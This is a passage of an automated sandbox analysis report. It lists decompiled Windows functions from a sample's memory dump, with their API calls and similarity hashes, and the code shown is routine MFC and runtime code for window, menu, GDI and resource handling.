                    • Part of subcall function 0041D1CE: __EH_prolog3.LIBCMT ref: 0041D1D5
                  • CreateEventA.KERNEL32 ref: 00403B29
                  • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 00403B37
                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00403B43
                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00403B4F
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CreateEvent$H_prolog3
                  • String ID:
                  • API String ID: 206838378-0
                  • Opcode ID: 23266c3987b3ff5da8ba88f8e17e721f5d67cef59dd7dd30058481ae8eb27049
                  • Instruction ID: ec9cf088c3628b43aeeb3f39e7f916201a3be1a383270fb54bcac765ecbc65bc
                  • Opcode Fuzzy Hash: 23266c3987b3ff5da8ba88f8e17e721f5d67cef59dd7dd30058481ae8eb27049
                  • Instruction Fuzzy Hash: 631156F0900B48AEE3209F6A8884B53FAECFF49358F51482EA1DA87650C7746844CF20
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0042EDD4, Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                  Download Yara Rule
                  C-Code - Quality: 94%
                  			E0042EDD4(void* __ebx, void* __ecx, void* __edx, struct tagPOINT* _a8) {
				struct tagPOINT _v12;
				void* __edi;
				struct tagPOINT* _t8;
				struct HWND__* _t9;
				int _t14;
				long _t19;
				void* _t20;
				struct HWND__* _t22;
				struct HWND__* _t23;
				struct HWND__* _t26;

				_t20 = __edx;
				_t8 = _a8;
				_v12.x = _t8->x;
				_t19 = _t8->y;
				_push(_t19);
				_v12.y = _t19;
				_t9 = WindowFromPoint( *_t8);
				_t26 = _t9;
				if(_t26 != 0) {
					_t22 = GetParent(_t26);
					if(_t22 == 0 || E0041FDA4(__ebx, _t20, _t22, _t22, 2) == 0) {
						ScreenToClient(_t26,  &_v12);
						_t23 = E0041FE4A(_t26, _v12.x, _v12.y);
						if(_t23 == 0) {
							L6:
							_t9 = _t26;
						} else {
							_t14 = IsWindowEnabled(_t23);
							_t9 = _t23;
							if(_t14 != 0) {
								goto L6;
							}
						}
					} else {
						_t9 = _t22;
					}
				}
				return _t9;
			}













                  0x0042edd4
                  0x0042eddb
                  0x0042ede1
                  0x0042ede4
                  0x0042ede7
                  0x0042edea
                  0x0042eded
                  0x0042edf3
                  0x0042edf7
                  0x0042ee01
                  0x0042ee05
                  0x0042ee1c
                  0x0042ee2e
                  0x0042ee32
                  0x0042ee41
                  0x0042ee41
                  0x0042ee34
                  0x0042ee35
                  0x0042ee3d
                  0x0042ee3f
                  0x00000000
                  0x00000000
                  0x0042ee3f
                  0x0042ee13
                  0x0042ee13
                  0x0042ee13
                  0x0042ee43
                  0x0042ee46

                  APIs
                  • WindowFromPoint.USER32(?,?), ref: 0042EDED
                  • GetParent.USER32(00000000), ref: 0042EDFB
                  • ScreenToClient.USER32 ref: 0042EE1C
                  • IsWindowEnabled.USER32(00000000), ref: 0042EE35
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$ClientEnabledFromParentPointScreen
                  • String ID:
                  • API String ID: 1871804413-0
                  • Opcode ID: 09ae46004f4857c8d73721675ea0760a74aa4fdc1be718844f7737e07083e2e8
                  • Instruction ID: b4a697f47c67ab9837afbcedfbb94ed47278685bea9992d24b7a779d1c0570bb
                  • Opcode Fuzzy Hash: 09ae46004f4857c8d73721675ea0760a74aa4fdc1be718844f7737e07083e2e8
                  • Instruction Fuzzy Hash: 00018436700524BF87129B9AEC05DAF7BB9EFCA700B59002AF905D7310EB39CD019769
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00404697, Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00404697(void* __ecx, struct HMENU__* _a4) {
				int _v8;
				struct HMENU__* _v12;
				struct HMENU__* _t8;
				int _t9;
				int _t11;
				int _t12;
				int _t16;
				struct HMENU__* _t19;

				if(_a4 != 0) {
					_t8 = GetMenuItemCount(_a4);
					while(_t8 != 0) {
						_t9 = _t8 - 1;
						_v12 = _t9;
						_t19 = GetSubMenu(_a4, _t9);
						if(_t19 == 0) {
							L8:
							_t8 = _v12;
							continue;
						}
						_t11 = GetMenuItemCount(_t19);
						_t16 = 0;
						_v8 = _t11;
						if(_t11 <= 0) {
							goto L8;
						} else {
							goto L5;
						}
						while(1) {
							L5:
							_t12 = GetMenuItemID(_t19, _t16);
							if(_t12 >= 0xe130 && _t12 <= 0xe13f) {
								break;
							}
							_t16 = _t16 + 1;
							if(_t16 < _v8) {
								continue;
							}
							goto L8;
						}
						_t8 = _t19;
						break;
					}
					return _t8;
				}
				return 0;
			}











                  0x004046a2
                  0x004046b4
                  0x004046f7
                  0x004046b8
                  0x004046bd
                  0x004046c6
                  0x004046ca
                  0x004046f4
                  0x004046f4
                  0x00000000
                  0x004046f4
                  0x004046cd
                  0x004046cf
                  0x004046d1
                  0x004046d6
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004046d8
                  0x004046d8
                  0x004046da
                  0x004046e5
                  0x00000000
                  0x00000000
                  0x004046ee
                  0x004046f2
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004046f2
                  0x00404702
                  0x00000000
                  0x00404702
                  0x00000000
                  0x004046fd
                  0x00000000

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CountItemMenu
                  • String ID:
                  • API String ID: 1409047151-0
                  • Opcode ID: 86433844df9c92315779f0bf3a59f81ac8ab8415fea35b458be3f3d47a692d0d
                  • Instruction ID: 8276e2b91934d31df3356f8f8f605792c0e2d79c3701d85367bebcb7180b13e2
                  • Opcode Fuzzy Hash: 86433844df9c92315779f0bf3a59f81ac8ab8415fea35b458be3f3d47a692d0d
                  • Instruction Fuzzy Hash: A001F2B5900109BFDB004B65CC8486F7AA9EBD3344F610837EA01F3290FA7ECD41AA68
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0043E6D3, Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0043E6D3(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E0043DFC4(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E0043E0B4(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E0043E5D9(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E0043E51E(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}






                  0x0043e6d8
                  0x0043e6de
                  0x0043e751
                  0x00000000
                  0x0043e6e5
                  0x0043e6e5
                  0x0043e6e8
                  0x0043e703
                  0x0043e706
                  0x0043e726
                  0x0043e738
                  0x0043e708
                  0x0043e708
                  0x0043e70b
                  0x00000000
                  0x0043e70d
                  0x0043e71f
                  0x0043e71f
                  0x0043e70b
                  0x0043e756
                  0x0043e75a
                  0x0043e6ea
                  0x0043e702
                  0x0043e702
                  0x0043e6e8

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                  • String ID:
                  • API String ID: 3016257755-0
                  • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                  • Instruction ID: 599c970f0d7140b4d8948086046bd40c7f1d60777e1d6830c4359a05df86eb3f
                  • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                  • Instruction Fuzzy Hash: 4F11803240114EBBCF265EC6CC41CEE3F22BB0C394F189416FA18591B1D73AD9B2AB85
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040F188, Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                  Download Yara Rule
                  C-Code - Quality: 90%
                  			E0040F188(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				void* __edi;
				void* __esi;
				struct HWND__* _t9;
				struct HWND__* _t10;
				void* _t14;
				void* _t15;
				struct HWND__* _t16;
				struct HWND__* _t17;

				_t14 = __ecx;
				_t13 = __ebx;
				_t9 = GetDlgItem(_a4, _a8);
				_t15 = GetTopWindow;
				_t16 = _t9;
				if(_t16 == 0) {
					L6:
					_t10 = GetTopWindow(_a4);
					while(1) {
						_t17 = _t10;
						__eflags = _t17;
						if(_t17 == 0) {
							goto L10;
						}
						_t10 = E0040F188(_t13, _t14, _t17, _a8, _a12);
						__eflags = _t10;
						if(_t10 == 0) {
							_t10 = GetWindow(_t17, 2);
							continue;
						}
						goto L10;
					}
				} else {
					if(GetTopWindow(_t16) == 0) {
						L3:
						_push(_t16);
						if(_a12 == 0) {
							return E0040EE3C(_t13, _t14);
						}
						_t10 = E0040EE68(_t14, _t15, _t16, __eflags);
						__eflags = _t10;
						if(_t10 == 0) {
							goto L6;
						}
					} else {
						_t10 = E0040F188(__ebx, _t14, _t16, _a8, _a12);
						if(_t10 == 0) {
							goto L3;
						}
					}
				}
				L10:
				return _t10;
			}











                  0x0040f188
                  0x0040f188
                  0x0040f195
                  0x0040f19b
                  0x0040f1a1
                  0x0040f1a5
                  0x0040f1d5
                  0x0040f1d8
                  0x0040f1f5
                  0x0040f1f5
                  0x0040f1f7
                  0x0040f1f9
                  0x00000000
                  0x00000000
                  0x0040f1e3
                  0x0040f1e8
                  0x0040f1ea
                  0x0040f1ef
                  0x00000000
                  0x0040f1ef
                  0x00000000
                  0x0040f1ea
                  0x0040f1a7
                  0x0040f1ac
                  0x0040f1be
                  0x0040f1c2
                  0x0040f1c3
                  0x00000000
                  0x0040f1c5
                  0x0040f1cc
                  0x0040f1d1
                  0x0040f1d3
                  0x00000000
                  0x00000000
                  0x0040f1ae
                  0x0040f1b5
                  0x0040f1bc
                  0x00000000
                  0x00000000
                  0x0040f1bc
                  0x0040f1ac
                  0x0040f1fe
                  0x0040f1fe

                  APIs
                  • GetDlgItem.USER32 ref: 0040F195
                  • GetTopWindow.USER32(00000000), ref: 0040F1A8
                    • Part of subcall function 0040F188: GetWindow.USER32(00000000,00000002), ref: 0040F1EF
                  • GetTopWindow.USER32(?), ref: 0040F1D8
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$Item
                  • String ID:
                  • API String ID: 369458955-0
                  • Opcode ID: 68f76c8b40c0a4f109fccf0564f6876d2fd39e1f2526f7d48fb36ded73cfd4b3
                  • Instruction ID: e83c7ebf38d33043e2068e8d2e03b0507baf608e2471e865396bf5c0c4cbf0b1
                  • Opcode Fuzzy Hash: 68f76c8b40c0a4f109fccf0564f6876d2fd39e1f2526f7d48fb36ded73cfd4b3
                  • Instruction Fuzzy Hash: 7D01843600151AF7CB326F62CC04E9F3A25AF853A4F154436FC04B9690EB39CD19A6ED
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0042D6BA, Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0042D6BA(void* __ecx, void* __edx, int _a4) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HDC__* _t8;
				void* _t13;
				void* _t16;
				void* _t19;
				int _t20;
				void* _t21;
				void* _t22;
				void* _t23;

				_t19 = __edx;
				_t17 = __ecx;
				_t20 = _a4;
				_t23 = __ecx;
				_t16 = GetStockObject(_t20);
				if(_t20 < 0xa) {
					L6:
					_t8 =  *(_t23 + 4);
					_t21 = SelectObject;
					__eflags = _t8;
					if(__eflags != 0) {
						SelectObject(_t8, _t16);
					}
					return E00423045(_t16, _t17, _t21, _t23, __eflags, SelectObject( *(_t23 + 8), _t16));
				}
				if(_t20 > 0xe) {
					if(_t20 <= 0xf) {
						goto L6;
					}
					_t27 = _t20 - 0x11;
					if(_t20 > 0x11) {
						goto L6;
					}
				}
				_t13 = E00423045(_t16, _t17, _t20, _t23, _t27, SelectObject( *(_t23 + 8), _t16));
				_t22 = _t13;
				if( *(_t23 + 0x2c) != _t16) {
					 *(_t23 + 0x2c) = _t16;
					E0042D0D6(_t16, _t23, _t19, _t22);
					return _t22;
				}
				return _t13;
			}















                  0x0042d6ba
                  0x0042d6ba
                  0x0042d6c2
                  0x0042d6c6
                  0x0042d6d1
                  0x0042d6d3
                  0x0042d709
                  0x0042d709
                  0x0042d70c
                  0x0042d712
                  0x0042d714
                  0x0042d718
                  0x0042d718
                  0x00000000
                  0x0042d721
                  0x0042d6d8
                  0x0042d6dd
                  0x00000000
                  0x00000000
                  0x0042d6df
                  0x0042d6e2
                  0x00000000
                  0x00000000
                  0x0042d6e2
                  0x0042d6ef
                  0x0042d6f4
                  0x0042d6f9
                  0x0042d6fd
                  0x0042d700
                  0x00000000
                  0x0042d705
                  0x0042d72a

                  APIs
                  • GetStockObject.GDI32(?), ref: 0042D6C8
                  • SelectObject.GDI32(?,00000000), ref: 0042D6E8
                  • SelectObject.GDI32(?,00000000), ref: 0042D718
                  • SelectObject.GDI32(?,00000000), ref: 0042D71E
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Object$Select$Stock
                  • String ID:
                  • API String ID: 3337941649-0
                  • Opcode ID: 2f7f9bea765bc1341faf6002da9c0cd4a18686eb5a479f1f2981bcc4718750c8
                  • Instruction ID: 0014f9278ba29070fe8a6d1f7dd1e75f7b0d1f9d871fab654dfc0410fee6f02e
                  • Opcode Fuzzy Hash: 2f7f9bea765bc1341faf6002da9c0cd4a18686eb5a479f1f2981bcc4718750c8
                  • Instruction Fuzzy Hash: 81018676B003646B86202BBBFC8881F77ADFAD5755385492FF106C3612DA3DDC428B68
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00404E93, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                  Download Yara Rule
                  C-Code - Quality: 80%
                  			E00404E93(intOrPtr __ecx) {
				intOrPtr _v8;
				long _v12;
				struct HWND__* _t21;
				intOrPtr* _t30;

				_push(__ecx);
				_push(__ecx);
				_v8 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x20)) != 0) {
					_t30 = E0040474E(__ecx);
					_t21 =  *(_t30 + 0x20);
					_v12 = SetWindowLongA(_t21, 0xfffffff0, GetWindowLongA(_t21, 0xfffffff0) & 0xffff7fff);
					E00404A2E(_v8);
					if(IsWindow(_t21) != 0) {
						SetWindowLongA(_t21, 0xfffffff0, _v12);
						 *((intOrPtr*)( *_t30 + 0x178))(1);
					}
					return 1;
				} else {
					return 0;
				}
			}







                  0x00404e98
                  0x00404e99
                  0x00404e9e
                  0x00404ea1
                  0x00404eaf
                  0x00404eb1
                  0x00404ed1
                  0x00404ed4
                  0x00404ee2
                  0x00404eea
                  0x00404ef2
                  0x00404ef2
                  0x00404eff
                  0x00404ea3
                  0x00404ea6
                  0x00404ea6

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$Long
                  • String ID:
                  • API String ID: 847901565-0
                  • Opcode ID: 1ae47132c50d68974ba8675a73dd19e1812ace48a7251e8b5cf853d1bf8cc61d
                  • Instruction ID: 4249becefff12f9aa532041eef5b774ba33af07bc398f959ababbc606d27a936
                  • Opcode Fuzzy Hash: 1ae47132c50d68974ba8675a73dd19e1812ace48a7251e8b5cf853d1bf8cc61d
                  • Instruction Fuzzy Hash: E80186B5204214BBDB009B75CC45E9B76ACFF85335F150769F522E32D1DB74D8018A68
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004122AD, Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                  Download Yara Rule
                  C-Code - Quality: 88%
                  			E004122AD(intOrPtr __ecx, CHAR* _a4) {
				intOrPtr _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t7;
				struct HRSRC__* _t10;
				void* _t13;
				void* _t18;
				void* _t20;
				void* _t21;
				struct HINSTANCE__* _t23;

				_push(__ecx);
				_push(_t20);
				_t13 = 0;
				_t18 = 0;
				_v8 = __ecx;
				_t24 = _a4;
				if(_a4 == 0) {
					L4:
					_t21 = E00411E27(_v8, _t18, _t18);
					if(_t18 != 0 && _t13 != 0) {
						FreeResource(_t13);
					}
					_t7 = _t21;
				} else {
					_t23 =  *(E0041F363(0, 0, _t20, _t24) + 0xc);
					_t10 = FindResourceA(_t23, _a4, 0xf0);
					if(_t10 == 0) {
						goto L4;
					} else {
						_t7 = LoadResource(_t23, _t10);
						_t13 = _t7;
						if(_t13 != 0) {
							_t18 = LockResource(_t13);
							goto L4;
						}
					}
				}
				return _t7;
			}















                  0x004122b2
                  0x004122b4
                  0x004122b6
                  0x004122b8
                  0x004122ba
                  0x004122bd
                  0x004122c0
                  0x004122f4
                  0x004122fd
                  0x00412301
                  0x00412308
                  0x00412308
                  0x0041230e
                  0x004122c2
                  0x004122c7
                  0x004122d3
                  0x004122db
                  0x00000000
                  0x004122dd
                  0x004122df
                  0x004122e5
                  0x004122e9
                  0x004122f2
                  0x00000000
                  0x004122f2
                  0x004122e9
                  0x004122db
                  0x00412314

                  APIs
                  • FindResourceA.KERNEL32(?,?,000000F0), ref: 004122D3
                  • LoadResource.KERNEL32(?,00000000), ref: 004122DF
                  • LockResource.KERNEL32(00000000), ref: 004122EC
                  • FreeResource.KERNEL32(00000000), ref: 00412308
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Resource$FindFreeLoadLock
                  • String ID:
                  • API String ID: 1078018258-0
                  • Opcode ID: 332a509225835964b8b30f771263e14b9896a6b914ce92aa81eca866c340bb78
                  • Instruction ID: eb341e2990d3aa9b8187f0255b35ca994ee6d51934ff18c2a607a87465d7b55a
                  • Opcode Fuzzy Hash: 332a509225835964b8b30f771263e14b9896a6b914ce92aa81eca866c340bb78
                  • Instruction Fuzzy Hash: EFF0AF373002066B97115FE79D84AAFBAACEB82660704407ABE05E3201DEB8DD51C668
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040B7EE, Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0040B7EE(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v16;
				int _t12;
				int _t16;
				int _t18;
				intOrPtr _t19;
				void* _t24;
				intOrPtr* _t27;

				_t19 = _a4;
				_t27 = __ecx;
				E004210DA(__ecx, _t19, _a8);
				_t12 = E00412B38(__ecx);
				if((_t12 & 0x00000100) != 0) {
					_t12 = IsZoomed(GetParent( *(__ecx + 0x20)));
					if(_t12 == 0) {
						 *((intOrPtr*)( *_t27 + 0x118))(0x407, 0,  &_v16, _t24);
						_t16 = GetSystemMetrics(5);
						_t18 = GetSystemMetrics(2);
						 *((intOrPtr*)(_t19 + 8)) =  *((intOrPtr*)(_t19 + 8)) - _t16 + _t16 - _v16 - _t18;
						return _t18;
					}
				}
				return _t12;
			}










                  0x0040b7f7
                  0x0040b7fe
                  0x0040b801
                  0x0040b808
                  0x0040b812
                  0x0040b81e
                  0x0040b826
                  0x0040b838
                  0x0040b846
                  0x0040b854
                  0x0040b858
                  0x00000000
                  0x0040b85b
                  0x0040b826
                  0x0040b85f

                  APIs
                    • Part of subcall function 00412B38: GetWindowLongA.USER32 ref: 00412B43
                  • GetParent.USER32(?), ref: 0040B817
                  • IsZoomed.USER32(00000000), ref: 0040B81E
                  • GetSystemMetrics.USER32 ref: 0040B846
                  • GetSystemMetrics.USER32 ref: 0040B854
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: MetricsSystem$LongParentWindowZoomed
                  • String ID:
                  • API String ID: 3909876373-0
                  • Opcode ID: 50fbf73481a51665d2d0241603ecccdcb06c2f19cfcb8e85b1be4ce2a126c7ca
                  • Instruction ID: 534eef765553c006db369b194f787ffef2b2917ffcbab35e9eb90092d6656bda
                  • Opcode Fuzzy Hash: 50fbf73481a51665d2d0241603ecccdcb06c2f19cfcb8e85b1be4ce2a126c7ca
                  • Instruction Fuzzy Hash: 8701A7376002146BDB107BB5DC4AB8ABB68EF54714F058129FB05EB191D674A800CBA9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040D2F2, Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0040D2F2(struct HDC__* _a4, intOrPtr _a8, intOrPtr _a12, void* _a16, long _a20) {
				long _v12;
				void _v16;
				intOrPtr _t12;
				long _t16;
				void* _t21;
				void* _t22;
				void* _t23;

				if(_a4 == 0 || _a16 == 0) {
					L10:
					return 0;
				} else {
					_t12 = _a12;
					if(_t12 == 1 || _t12 == 0 || _t12 == 5 || _t12 == 2 && E0041FDA4(_t21, _t22, _t23, _a8, _t12) == 0) {
						goto L10;
					} else {
						GetObjectA(_a16, 0xc,  &_v16);
						SetBkColor(_a4, _v12);
						_t16 = _a20;
						if(_t16 == 0xffffffff) {
							_t16 = GetSysColor(8);
						}
						SetTextColor(_a4, _t16);
						return 1;
					}
				}
			}










                  0x0040d2fe
                  0x0040d363
                  0x00000000
                  0x0040d306
                  0x0040d306
                  0x0040d30c
                  0x00000000
                  0x0040d329
                  0x0040d332
                  0x0040d33e
                  0x0040d344
                  0x0040d34a
                  0x0040d34e
                  0x0040d34e
                  0x0040d358
                  0x00000000
                  0x0040d360
                  0x0040d30c

                  APIs
                  • GetObjectA.GDI32(00000000,0000000C,?), ref: 0040D332
                  • SetBkColor.GDI32(00000000,00000000), ref: 0040D33E
                  • GetSysColor.USER32(00000008), ref: 0040D34E
                  • SetTextColor.GDI32(00000000,?), ref: 0040D358
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Color$ObjectText
                  • String ID:
                  • API String ID: 829078354-0
                  • Opcode ID: 0917485d60be57fba84de33db906499c11b2f6a15f302fa225eb6ba83a7df9d6
                  • Instruction ID: bff7330aa8aa4276d550d16e5f7a19a6b3b1f139b7051842c5f6b980f89d7a30
                  • Opcode Fuzzy Hash: 0917485d60be57fba84de33db906499c11b2f6a15f302fa225eb6ba83a7df9d6
                  • Instruction Fuzzy Hash: 27014F35900108ABDF215FB5DC89AAF3BA5FB45314F188132FD51E22E0C734CC99CA5A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0042D94D, Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0042D94D(void* __ecx) {
				struct tagPOINT _v12;
				struct tagPOINT _v20;
				struct HDC__* _t19;

				_t19 =  *(__ecx + 8);
				if(_t19 != 0 &&  *(__ecx + 4) != 0) {
					GetViewportOrgEx(_t19,  &_v12);
					E0042D602(__ecx,  &_v12);
					_v12.y = _v12.y +  *((intOrPtr*)(__ecx + 0x24));
					_v12.x = _v12.x +  *((intOrPtr*)(__ecx + 0x20));
					SetViewportOrgEx( *(__ecx + 4), _v12, _v12.y, 0);
					GetWindowOrgEx( *(__ecx + 8),  &_v20);
					return SetWindowOrgEx( *(__ecx + 4), _v20, _v20.y, 0);
				}
				return _t19;
			}






                  0x0042d958
                  0x0042d95d
                  0x0042d96a
                  0x0042d976
                  0x0042d97e
                  0x0042d984
                  0x0042d992
                  0x0042d99f
                  0x00000000
                  0x0042d9b0
                  0x0042d9b8

                  APIs
                  • GetViewportOrgEx.GDI32(?,?), ref: 0042D96A
                    • Part of subcall function 0042D602: GetViewportExtEx.GDI32(?,?), ref: 0042D615
                    • Part of subcall function 0042D602: GetWindowExtEx.GDI32(?,?), ref: 0042D622
                  • SetViewportOrgEx.GDI32(00000000,?,00000000,00000000), ref: 0042D992
                  • GetWindowOrgEx.GDI32(?,?), ref: 0042D99F
                  • SetWindowOrgEx.GDI32(00000000,?,?,00000000), ref: 0042D9B0
                  Memory Dump Source
